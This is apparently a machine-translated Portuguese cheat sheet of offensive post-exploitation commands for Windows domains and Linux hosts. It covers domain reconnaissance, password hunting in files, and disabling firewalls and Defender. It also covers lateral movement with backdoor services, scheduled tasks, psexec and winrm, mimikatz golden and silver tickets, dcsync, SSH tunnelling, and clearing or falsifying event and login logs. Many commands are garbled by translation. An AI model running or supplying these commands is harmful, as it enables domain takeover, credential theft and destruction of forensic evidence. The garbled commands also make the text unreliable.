tempo líquido/domínio net grupo "administradores de domínio" /domínio net grupo "controladores de domínio" /domínio administrador de usuário da rede /domínio nltest /domain_trusts Obtenha relação de confiança de domínio nltest /dclist: participação líquida visualização líquida \\domainip net view /domain Ver lista de domínio/grupo de trabalho net view /domain:secwing Ver a lista de computadores no domínio secwing net config Estação de trabalho consulta a qual domínio a máquina pertence netstat -ano |findstr contas da rede Ver política de senha local

nbtstat -Uma consulta ip netbiso whoami /todos qwinsta //Ver status de login query user //Ver o último horário de login do administrador nltest /domain_trusts //Obter informações de confiança do domínio taskkill /f /im lista de tarefas /svc Ver processos lista de tarefas /S ip /U domínio omedeusuário /P /V //Ver a lista de processos do computador remoto tracert IP // Rastreamento de rota route print //Imprime tabela de roteamento arp -a //Lista todos os endereços IP ativos neste segmento de rede arp -s (ip MAC) // Vincula o endereço MAC e IP arp -d (ip MAC) //Desvincula endereços mac e ip consulta reg "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /ve Obtenha registros de login recentes do mstsc setspn -Q \*/\* lista SPN

findstr /si senha *.txt findstr /si senha *.xml findstr /si senha *.ini

dir /b /s autônomo.xml diretório /b /s web.config diretório /b /s sysprep.inf

netsh firewall definir modo de operação = desabilitar netsh advfirewall desativa o estado de todos os perfis

parada de rede windefend

redefinição de firewall netsh

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Servidor /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Estabelecer conexão de uso da rede net use \\192.168.1.100\c$ 1qaz@WSX /domínio do usuário\usuário Copie o arquivo bat para o computador remoto copie exec.bat \192.168.1.100\c$\windows\debug\exec.bat Ver horário do computador remoto hora líquida \\192.168.1.100 Crie uma nova tarefa agendada remota em \\192.168.1.100 21.52 c:\windows\temp\exec.bat Veja a lista de tarefas agendadas remotamente em \192.168.1.100

Criar tarefas schtasks /create /s ip /u administrador /senha /ru "sistema" /tn adduser(nome) /sc DAILY(hora) /tr c:\windows\debug\add.bat /f Executar tarefas schtasks /run /s ip /u administrador /p senha /tn adduser /i schtasks /run /tn update /$ 10.10.10.137 /u teste \administrador /p 1qaz@WSX Excluir tarefa schtasks /delete /s ip /u administrador /p senha /tn adduser /f

Estabeleça conexão ipc e execute SC uso líquido \\192.168.17.138\c$ "admin123" /usuário:pt007 uso líquido diretório\192.168.17.138\c$ copie test.exe \\192.168.17.138\c$ Criar serviço sc \\remote_ip criar services_name binpath= c:\backdoor.exe sc \\10.10.10.10 criar atualização binpath= c:\programdata\a.bat Começar serviço sc \\remote_ip iniciar nomes_serviços sc \\10.10.10.10 iniciar atualização Fora de serviço sc \\remote_ip parar nome_do_serviço sc \\10.10.10.10 parar atualização Excluir serviço sc \\remote_ip excluir nome_do_serviço sc \\10.10.10.10 excluir atualização

netsh firewall show config //Ver política de firewall netsh firewall show state //Ver política de firewall Habilitar encaminhamento de porta netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport abrir firewall netsh advfirewall firewall adicionar regra nome = "nome do firewall" protocolo = dir TCP = in localip = ip localport = porta action = permitir Mostrar todas as regras de encaminhamento interface netsh portproxy mostrar tudo Excluir para frente netsh interface portproxy excluir v4tov4 listenport = porta listenaddress = ip reiniciar redefinição do proxy da porta da interface netsh

1. encaminhamento de porta ssh ssh -L [<host local>:] <porta local>:<host remoto>:<porta remota><nome do host ssh> 2. encaminhamento de porta reversa ssh ssh -R [<host local>:]<porta local>:<host remoto>:<porta remota><nome do host ssh> 3. proxy de meias ssh ssh -D [<host local>:] <porta local><nome do host ssh>

Condições e requisitos para notas douradas: 1. Nome de domínio 2. Valor SID do domínio whoami /user 3. Hash de senha NTLM da conta Krbtgt do domínio 4. Nome de usuário forjado sekurlsa::pth /usuário:administrador /domínio:"GOD.org" /ntlm:61465a991b168727b65b3644aab823cd Valor de criptografia ntlm do endereço de domínio do usuário de login Uma caixa CMD aparecerá aqui. Vamos verificar se temos permissão primeiro usando dir \\OWA.GOD.org\c$ [Ver unidade C de controle de domínio] diretório \\\\DC.zkaq.cn\c$ lsadump::dcsync /user:krbtgt /domain: Obtenha a senha de krbtgt [mimikatz simulará o controle de domínio e solicitará as informações de conta e senha do controle de domínio de destino] Extraia o sid e o hashNTLM dentro Kerberos :: GOLDEN /Admin: administrador /domain:god.org /sign: S-1-5-21-2952760202-13539024381784089 /KRBTGT: 58e91a5886513AB2224312314000 61 /ticket:Administrator.kiribi [Contas de produção] kerberos::ptt administrador.kiribi [carregar ticket] Injeção direta de notas de ouro kerveros::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:domainsid /krbtgt:hash /ptt kerberos::purge limpa tickets privilégio::depurar Aguarde o administrador fazer login para obter a senha mimikatz #privilege::debug Privilégio '20' OK mimikatz # misc::memssp Injetado =) mimikatz #exit

Ver o ID do usuário atual whoami /usuário Obtenha o hash do computador de destino sekurlsa::logonpasswords Vulnerabilidade 1472 Gerar notas de prata kerberos::golden /sid:domainsid /domain:test.local /ptt /id: ID de usuário falso /target:mdc.test.local /service:cifs /rc: hash do computador de destino /user: nome de usuário falso

dsquery.exe user -limit 0#Consulta informações do objeto do usuário dsquery.exe group -limit 0 #Consulta informações do objeto do grupo dsquery.exe ou -limit 0#Consultar informações do objeto OU dsquery user domainroot -limit 65535 && net user /domain //Listar todos os nomes de usuários no domínio dsquery server -domain supre.com | dsget server -dnsname -site //Pesquise todos os controladores de domínio no domínio e exiba seus nomes de host DNS e nomes de site dsquery contact //Encontre contatos no diretório sub-rede dsquery //Liste as divisões dos segmentos de rede neste domínio dsquery group && net group /domain //Lista os grupos neste domínio dsquery ou //Listar unidades organizacionais neste domínio dsquery server && net time /domain //Lista os controladores de domínio neste domínio dsquery site -o rdn //Pesquisa todos os nomes de sites no domínio dsquery group dc=GOD,dc=org |mais Pesquise todos os grupos no domínio dc=god, dc=org computador dsquery.exe #Encontre o computador no destino Site dsquery.exe #Encontre unidades organizacionais no diretório servidor dsquery.exe #Encontre a instância do AD DC/LDS no diretório

AdFind -sc dclist #Listar nomes de controladores de domínio AdFind -sc computadores_ativo #Consulte os computadores online no domínio atual AdFind -sc computadores_ativo nome sistema operacional #Consulte os computadores on-line no domínio atual (apenas nome de exibição e sistema operacional) AdFind.exe -sc computadores_active name dnshostname #Consulte os hosts ativos no domínio e gere o nome do host e o nome do domínio AdFind -f "objectcategory=computer" #Consulta todos os computadores no domínio atual AdFind -f "objectcategory=computer" name OperatingSystem #Consulta todos os computadores no domínio atual (apenas o nome e o sistema operacional são exibidos) AdFind -users name #Consulte todos os usuários no domínio AdFind -sc gpodmp #Consulta todos os GPOs AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* #Consulte as informações detalhadas de todos os usuários no domínio AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test #Consulte detalhes específicos do usuário no domínio AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test mail #Consulte informações específicas do usuário (e-mail) no domínio AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -dn #Consulte as informações de dn de todos os usuários no domínio AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -c #Consulte o número de usuários no domínio AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:* #Consulte as informações detalhadas de todos os grupos no domínio AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:*Admin #Consulte as informações detalhadas de todos os grupos no domínio cujo nome de grupo contém Admin AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc o:* #Consulte todos os detalhes da UO no domínio AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc c:* #Consulte as informações detalhadas de todos os computadores no domínio AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc s:* #Consulte as informações detalhadas de todos os sites do domínio

psexec.exe -accepteula \\10.10.10.137 -u teste\administrador -p 1qaz@WSX -i cmd.exe psexec.exe -accepteula -i -s -d cmd paexec.exe \ip -u domínio\usuário -p pwd cmd.exe -noname net use \\ip pwd /u:domínio\usuário paexec.exe \\ip cmd.exe netsh winhttp sh proxy visualizar proxy

winrm configuração rápida -q winrm s winrm/config/Cliente @{TrustedHosts="*"} Adicionado monitoramento da porta 80 winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} Modifique 5985 para 80 winrm set winrm/config/Listener?Address=* Transprot=HTTP @{porta=80} Modifique a porta WinRM para porta web winrs -r:http://xx -u:DC20\administratror -p:1qaz@WSX cmd

carregar Módulo Imoport .\PowerView.ps1 #Execute consulta Get-DomainGroup #Query detalhes do grupo Get-DomainOU #Consulte as informações detalhadas da UO Get-DomainUser #Query detalhes do usuário

nome de usuário psloggedon.exe -l exibe apenas usuários logados locais e não exibe outros usuários logados na rede -x não exibe o horário de login Exibe que o usuário conectado no momento na máquina remota pode digitar: psloggedon \\ip da máquina remota Adicione -accepteula pela primeira vez para não exibir informações de direitos autorais.

netsess.exe \\PRIMARY

PVEFindADUser.exe -atual

wevtutil epl Segurança C:\log.evtx /q:"*[EventData[Data[@Name='LogonType']='3'] e System[(EventID=4624) e TimeCreated[timediff(@SystemTime) <= 259200000 ]]]" /r:IP do computador remoto /u:nome de usuário/p:senha #epl registro de exportação #Segurança significa registro de segurança #C:\log.evtx representa o local do log exportado. Se exportado remotamente, ele será exportado para o computador remoto. #/q: representa a instrução de consulta de log #System[(EventID=4624) representa o ID de tempo de 4624, que é o log de login bem-sucedido do usuário #EventData[Data[@Name='LogonType']='3'] significa que o tipo de login é login de rede #TimeCreated[timediff(@System Time) <= 259200000] significa que apenas os logs do último mês serão exportados. A unidade de 259200000 é milissegundos. Você pode alterar o tamanho do número de acordo com as necessidades reais. #Se você exportar localmente, não será necessário especificar a opção /r. Para obter mais informações sobre #wevtutil, consulte sua documentação de ajuda, que pode ser usada para excluir logs do Windows.

LogParser.exe -i:EVT -o csv "SELECIONE TO_UPPERCASE distinto(EXTRACT_TOKEN(Strings,5,'|')) como NOME DE USUÁRIO,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) como SOURCE_IP FROM C:\*. evtx" > C:\log.csv # -i:EVT significa que o formato de entrada do log é evtx # -o csv significa que o formato de saída é csv # O conteúdo entre aspas duplas é a instrução da consulta # distinto significa desduplicar os resultados # TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) as USERNAME Analise o nome do log do log de login # USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) Analise a fonte de login do log de login # *.evtx pode processar vários arquivos de log ao mesmo tempo # Você pode visualizar os detalhes do log de login através do seguinte comando LogParser.exe -i:EVT -o:DATAGRID "selecione * de *.evtx"

wevtutil el lista os nomes de todos os logs do sistema sistema wevtutil cl limpa logs do sistema O aplicativo wevtutil cl limpa os logs do aplicativo wevtutil cl security limpa logs de segurança for /f "delims=" %j in('wevtutil.exe el') do @wevtutil.exe cl "%j" c:\windows\system32\winevt\logs\

"C:\PROGRA~1\WINDOW~1\mpcmdrun.exe" -Restore -ListAll powershell -Command Add-MpPreference -ExclusãoPath "C:\tmp" powershell -Command Add-MpPreference -ExclusãoExtension".java" powershell -Command Add-MpPreference -ExclusãoProcess "*.exe" powershell -Command Get-MpPreference

/var/log/btmp registra todas as informações de falha de login, use o comando lastb para visualizar /var/log/lastlog registra o último registro de horário de login de todos os usuários no sistema. Use o comando lastlog para visualizá-lo. /var/log/wtmp registra as informações de login e logout de todos os usuários, use o último comando para visualizar /var/log/utmp registra as informações do usuário conectado no momento, use w, who, users e outros comandos para visualizar /var/log/secure registra informações de log relacionadas à segurança /var/log/message registra informações e logs de erros após a inicialização do sistema O último registro de login exibido ao fazer login no ssh último horário de login do n ip Gravado no arquivo /var/log/lastlog ~/.ssh/known_hosts Você pode usar sed para substituir sed -i 's/próprio ip/ip original' /var/log/lastlog sed -i '/data de hoje/nome do arquivo Faça login no sistema de forma invisível e não será detectado por w, who, last e outros comandos ssh -T raiz@192.168.01 /bin/bash -i